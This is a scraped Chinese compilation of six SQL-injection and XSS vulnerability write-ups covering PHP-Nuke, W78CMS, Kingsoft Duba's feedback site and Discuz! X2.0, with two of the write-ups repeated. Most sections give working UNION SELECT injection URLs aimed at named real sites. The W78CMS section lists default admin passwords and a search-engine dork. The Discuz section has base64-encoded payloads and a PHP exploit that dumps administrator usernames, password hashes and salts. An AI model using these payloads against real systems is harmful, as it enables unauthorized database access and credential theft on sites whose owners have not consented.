“粉色考拉”通过精心收集,向本站投稿了6篇PHPNuke绕过SQL注入保护及多个SQL注入漏洞,下面小编给大家整理后的PHPNuke绕过SQL注入保护及多个SQL注入漏洞,希望大家喜欢!
篇1:PHPNuke绕过SQL注入保护及多个SQL注入漏洞
受影响系统:
PHP-Nuke PHP-Nuke <= 8.0.0.3.3b
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 23528
PHP-Nuke是一个广为流行的网站创建和管理工具,它可以使用很多数据库软件作为后端,比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等,
PHP-Nuke实现上存在多个SQL注入漏洞,远程攻击者可能利用这些漏洞非授权操作数据库。
在mainfile.php文件中435行:
__________________________________________
//Union Tap
//Copyright Zhen-Xjell nukecops.com
//Beta 3 Code to prevent UNION SQL Injections
unset($matches);
unset($loc);
if(isset($_SERVER['QUERY_STRING'])) {
if (preg_match(“/([OdWo5NIbpuU4V2iJT0n]{5}) /”, \
rawurldecode($loc=$_SERVER['QUERY_STRING']), $matches)) { die('Illegal Operation \
1'); }
}
if(!isset($admin) OR (isset($admin) AND !is_admin($admin))) {
$queryString = $_SERVER['QUERY_STRING'];
if (($_SERVER['PHP_SELF'] != “/index.php”) OR !isset($url))
{
if (stristr($queryString,'')) die('Illegal Operation 2');
}
if ((stristr($queryString,'%20union%20')) OR (stristr($queryString,'/*')) OR \
(stristr($queryString,'*/union/*')) OR (stristr($queryString,'c2nyaxb0')) OR \
(stristr($queryString,'+union+')) OR ((stristr($queryString,'cmd=')) AND \
(!stristr($queryString,'&cmd'))) OR ((stristr($queryString,'exec')) AND \
(!stristr($queryString,'execu'))) OR (stristr($queryString,'concat'))) { \
die('Illegal Operation 3'); }
}__________________________________________
攻击者可以通过不同的过滤器绕过对SQL注入的保护。
此外Web_Links、News和Download模块中还存在多个SQL注入漏洞:
+++++++++++++++++++++++++++
PHP.ini
Magic Quotes = OFF
Register Global = ON
+++++++++++++++++++++++++++
Web_Links/index.php文件中有漏洞的函数如下:
function viewlinkcomments($lid) {
global $prefix, $db, $admin, $bgcolor2, $module_name, $admin_file;
include(“header.php”);
include(“modules/$module_name/l_config.php”);
menu(1);
$row = $db->sql_fetchrow($db->sql_query(“SELECT title FROM ”.$prefix.“_links_links \
WHERE lid='$lid'”)); // BUG --->$lid $ttitle = filter($row['title'], “nohtml”);
$lid = intval(trim($lid)); //WTF?<===== lol ??????????????? :):):):):)
echo “
”;
...
__________________________________________________
function viewlinkcomments($lid) {
function viewlinkeditorial($lid){
function viewlinkcomments($lid){
function ratelink($lid, $user) {
$lid变量没有经过过滤,因此攻击者可以执行任意sql命令,
Downloads模块中有漏洞函数:
function viewdownloadeditorial($lid) {
function viewdownloadcomments($lid) {
function ratedownload($lid, $user) {
$lid变量没有经过过滤。
News模块中有漏洞函数:
function rate_complete($sid, $rated=0, $score) {
$sid变量没有经过过滤。
链接:marc.info/?l=bugtraq&m=117682612903627&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
www.example.com/nuke/?%2f*
www.example.com/html80/?%2f**/UNION%2f**/SELECT
建议:
--------------------------------------------------------------------------------
厂商补丁:
PHP-Nuke
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
phpnuke.org/
篇2:PHPNuke 存在绕过SQL注入保护及多个SQL注入漏洞
受影响系统:
PHP-Nuke PHP-Nuke <= 8.0.0.3.3b
描述:
PHP-Nuke是一个广为流行的网站创建和管理工具,它可以使用很多数据库软件作为后端,比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等,
PHPNuke 存在绕过SQL注入保护及多个SQL注入漏洞
,
PHP-Nuke实现上存在多个SQL注入漏洞,远程攻击者可能利用这些漏洞非授权操作数据库。
攻击者可以通过不同的过滤器绕过对SQL注入的保护。此外Web_Links、News和Download模块中还存在多个SQL注入漏洞。
厂商补丁:
PHP-Nuke
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
篇3:W78CMS SQL注入漏洞
W78企业ASP网站管理系统V1.1的SQL注入
程序发布日期:03月18日.
裸奔的系统,
1.shopmore.asp
set rs=server.createobject(“adodb.recordset”)
exec=“select * from [shop] where ssfl=”& request.QueryString(“id”) &“ order by id desc ”
rs.open exec,conn,1,1
if rs.eof then
response.Write “ 该分类暂无产品!”
else
rs.PageSize =20 '每页记录条数
iCount=rs.RecordCount '记录总数
iPageSize=rs.PageSize
maxpage=rs.PageCount
page=request(“page”)
if Not IsNumeric(page) or page=“” then
page=1
2.about.asp
exec=“select * from [about] where id=”& request.QueryString(“id”)
set rs=server.createobject(“adodb.recordset”)
rs.open exec,conn,1,1
3.search_news.asp
dim title
title=request.form(“form_news”)
set rs=conn.execute(“select * from [news] where title like '%”&title&“%'”)
if title=“” then
response.write (“”)
end if
if rs.eof then
response.write (“”)
还有其他的页面,
4.此系统的在线编辑登录页面为admin/eWebEditor/admin/login.asp
默认user:admin password:198625
不能进的还可以试试
后台默认密码为86779533 abc123这两个
试试数据库默认地址为/data/%23sze7xiaohu.mdb
exp:www.voicetune.com/about.asp?id=2%20and%201=2%20union%20select%201,admin,3,password,5,6%20from%20admin
www.voicetune.com/ShopMore.asp?id=13%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7,8,9%20from%20admin
搜索型注入:%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
Google:inurl:ShopMore.asp?id
篇4:金山毒霸多个sql注入及XSS漏洞和修复
第一个
简要描述:由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限
详细说明:labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2
漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1
labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2
结果明显不同 注入漏洞产生
修复方案:过滤变量app
第二个
简要描述:过滤不严导致存在SQL注入
详细说明:过滤不严导致存在SQL注入 有机会拿下服务器权限
漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version,4,5,user(),database(),8,9--
labs.duba.net/robots.txt
未作进一步测试
修复方案:过滤参数
第三个:
简要描述:留言处过滤不严 造成跨站漏洞
详细说明:留言处过滤不严 造成跨站漏洞
漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5
留言处输入:
修复方案:严格过滤
篇5:金山毒霸多个sql注入及XSS漏洞和修复
金山毒霸多个sql注入及XSS漏洞和修复,需要的朋友可以参考下,
第一个
简要描述:由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限
详细说明:labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2
漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1
labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2
结果明显不同 注入漏洞产生
修复方案:过滤变量app
第二个
简要描述:过滤不严导致存在SQL注入
详细说明:过滤不严导致存在SQL注入 有机会拿下服务器权限
漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version(),4,5,user(),database(),8,9--
labs.duba.net/robots.txt
未作进一步测试
修复方案:过滤参数
第三个:
简要描述:留言处过滤不严 造成跨站漏洞
详细说明:留言处过滤不严 造成跨站漏洞
漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5
篇6:Discuz! X2.0 SQL多个注入漏洞及修复
DZ2.0直接暴管理账号密码(默认前缀的情况下)
/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd
29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl
rZSAnYWRtaW58eHx5%3D
base64解码
1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)
from pre_common_member where username like ‘admin|x|y
如果不是默认前缀
暴前缀EXP
/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR
VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1
FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D
———————–
再贴个PHP的EXP
$host=”www.2cto.com”;
$affuser=”要爆的用户名username”;
echo ‘
echo $host.”forum.php?mod=attachment&findpost=ss&aid=”;
echo urlencode(base64_encode(“1′ and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like ‘%_member|x|y”));
echo ‘” target=”_blank”>爆前缀’;
echo “”;
echo ‘
echo $host.”forum.php?mod=attachment&findpost=ss&aid=”;
echo urlencode(base64_encode(“1′ and 1=2 union all select 1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username like ‘$affuser|x|y”));
echo ‘” target=”_blank”>爆password,salt’;
?>
修复:官方已经昨天提供了安全升级不定,及时升级
